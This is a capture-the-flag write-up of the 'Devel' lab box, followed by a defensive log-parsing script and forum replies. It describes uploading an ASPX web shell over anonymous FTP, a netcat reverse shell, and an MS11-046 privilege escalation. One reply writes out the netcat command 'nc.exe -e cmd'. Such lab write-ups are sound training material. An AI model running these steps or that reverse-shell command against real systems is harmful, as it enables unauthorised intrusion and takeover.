Metasploitless Devel

PDF with images: https://jdwhitaker.github.io/static/devel.pdf

The Devel box is a great beginner-level challenge. The official walkthrough uses Metasploit. The box hinges on an unrealistic configuration issue where the FTP root is the same as the web root, and anonymous users may upload to the server. We leverage an ASPX web shell to gain a full reverse shell. Identifying the system architecture reveals it may have the privilege escalation vulnerability described in MS11-046. This proves to be true, as executing the binary yields full system access on the machine.

Methods

Initial Reconnaissance: Port Scanning

We nmap the target IP address with the default top ports, performing version scanning (-sV) and default script scanning (-sC).

We find that anonymous FTP login is allowed, and that the server is a Windows machine running IIS 7.5. We also find that the FTP root appears to be the same as the web root. After searching “IIS 7.5 asp” on the web, we find that classic ASP is not installed by default on IIS 7.0 and above. This indicates the server likely supports ASPX instead.

Web Shell

We upload the ASPX web shell and Windows netcat binary included with Kali.
We will use netcat to connect back to our machine for a standard reverse shell.

Upgrading to a Reverse Shell

We use our web shell to identify the location of the netcat binary we uploaded through ftp.
We run a netcat reverse shell back to our local machine.

Additional Reconnaissance: System Information

The OS version is 6.1.7600 N/A Build 7600.

Privilege Escalation

Searching “6.1.7600 N/A Build 7600 privilege escalation” online results in an exploit at https://www.exploit-db.com/exploits/40564. This exploits the vulnerability described in MS11-046.
We search for MS11-046 with searchsploit, compile the exploit we find [1] [2], and upload it to the remote target.
We execute the binary and gain system access.

Loot

We search for the flag files and print them.
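A defender-side companion to the misconfiguration described above: an added Python example (not part of this post) that parses IIS FTP W3C logs and flags completed anonymous STOR commands that drop server-side scripts or executables into a directory IIS also serves. The log lines and the field list are constructed here and assume the IIS 7.5 FTP W3C layout with `x-fullpath` enabled and the anonymous login recorded as `anonymous`.

```python
import os

# Constructed IIS 7.5 FTP W3C log sample (not from the original post).
# The parser reads column names from the #Fields directive rather than
# hard-coding positions, so it copes with a different field selection.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 7.5
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem sc-status sc-win32-status sc-substatus x-session x-fullpath
2024-01-01 10:00:02 10.10.14.2 anonymous 10.10.10.5 21 USER anonymous 331 0 0 1d2c3e4f -
2024-01-01 10:00:03 10.10.14.2 anonymous 10.10.10.5 21 PASS *** 230 0 0 1d2c3e4f /
2024-01-01 10:00:10 10.10.14.2 anonymous 10.10.10.5 21 STOR shell.aspx 226 0 0 1d2c3e4f /shell.aspx
2024-01-01 10:00:15 10.10.14.2 anonymous 10.10.10.5 21 STOR nc.exe 226 0 0 1d2c3e4f /nc.exe
2024-01-01 10:00:20 10.10.14.2 anonymous 10.10.10.5 21 STOR notes.txt 226 0 0 1d2c3e4f /notes.txt
2024-01-01 10:00:25 10.10.14.2 anonymous 10.10.10.5 21 STOR cmd.aspx 550 5 0 1d2c3e4f /cmd.aspx
2024-01-01 10:05:00 10.10.14.9 alice 10.10.10.5 21 STOR report.pdf 226 0 0 9a8b7c6d /uploads/report.pdf
2024-01-01 10:06:00 10.10.14.2 anonymous 10.10.10.5 21 RETR readme.txt 226 0 0 1d2c3e4f /readme.txt
"""

# Server-side script and executable types that an anonymous user should never
# be able to write into a directory IIS also serves.
RISKY_EXTENSIONS = {".aspx", ".asp", ".ashx", ".asmx", ".exe", ".dll", ".bat", ".ps1"}


def parse_w3c(text):
    """Yield one dict per record, keyed by the names in the latest #Fields line."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip() or fields is None:
            continue  # comment, blank, or data before any #Fields directive
        else:
            values = line.split()
            if len(values) == len(fields):
                yield dict(zip(fields, values))


def anonymous_uploads(text):
    """Return (client ip, stored path, risky?) for each completed anonymous STOR."""
    hits = []
    for rec in parse_w3c(text):
        if rec.get("cs-method") != "STOR" or rec.get("cs-username") != "anonymous":
            continue
        if not rec.get("sc-status", "").startswith("2"):  # only completed transfers
            continue
        path = rec.get("x-fullpath") or rec.get("cs-uri-stem", "")
        risky = os.path.splitext(path)[1].lower() in RISKY_EXTENSIONS
        hits.append((rec["c-ip"], path, risky))
    return hits
```

Records flagged `True` are the ones to alert on; the same rule set can be pointed at the anonymous user's write permission in the IIS FTP site settings to remove the root cause.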

Nice, thanks.

Question… when using the “Execute” command in the web browser…

Is it typed as the entire directory of the uploaded nc.exe? Below example:

C:\inetpub\wwwroot\nc.exe -e cmd

Because when I did this, it didn’t work… because shell back to the machine didn’t catch anything…

@sparkla. It’s good to share here. Rana Khalil from Medium is really doing a good job on making write-ups without msf. It’s great for learning and understanding how public exploits work.

Hello guys, I’m bumping this ( and created this forum account lol ) just to tell you that the box isn’t broken.

When you’re sending a binary file via FTP don’t forget to turn binary mode ON :smile:

Hope this helps you all and have a great day

I’m stuck on the last step as well… I uploaded the malicious aspx file to the site, ran the handler to create a meterpreter session after I browsed to said file, but could not get the kitrap0d exploit to work. I have it set to the correct session number and tun0 lhost (I started today and was stuck on lame for so long because I wasn’t using tun0). I followed 3 different write ups that did the same thing as me. At this point the only way to “try harder” is to ask for help :slight_smile:

btw I was able to get it working the following day. No clue what I did differently, I assume it had something to do with someone else on the box or losing connection to it…even though I restarted it the first time I tried. Who knew the whole try harder thing actually works haha.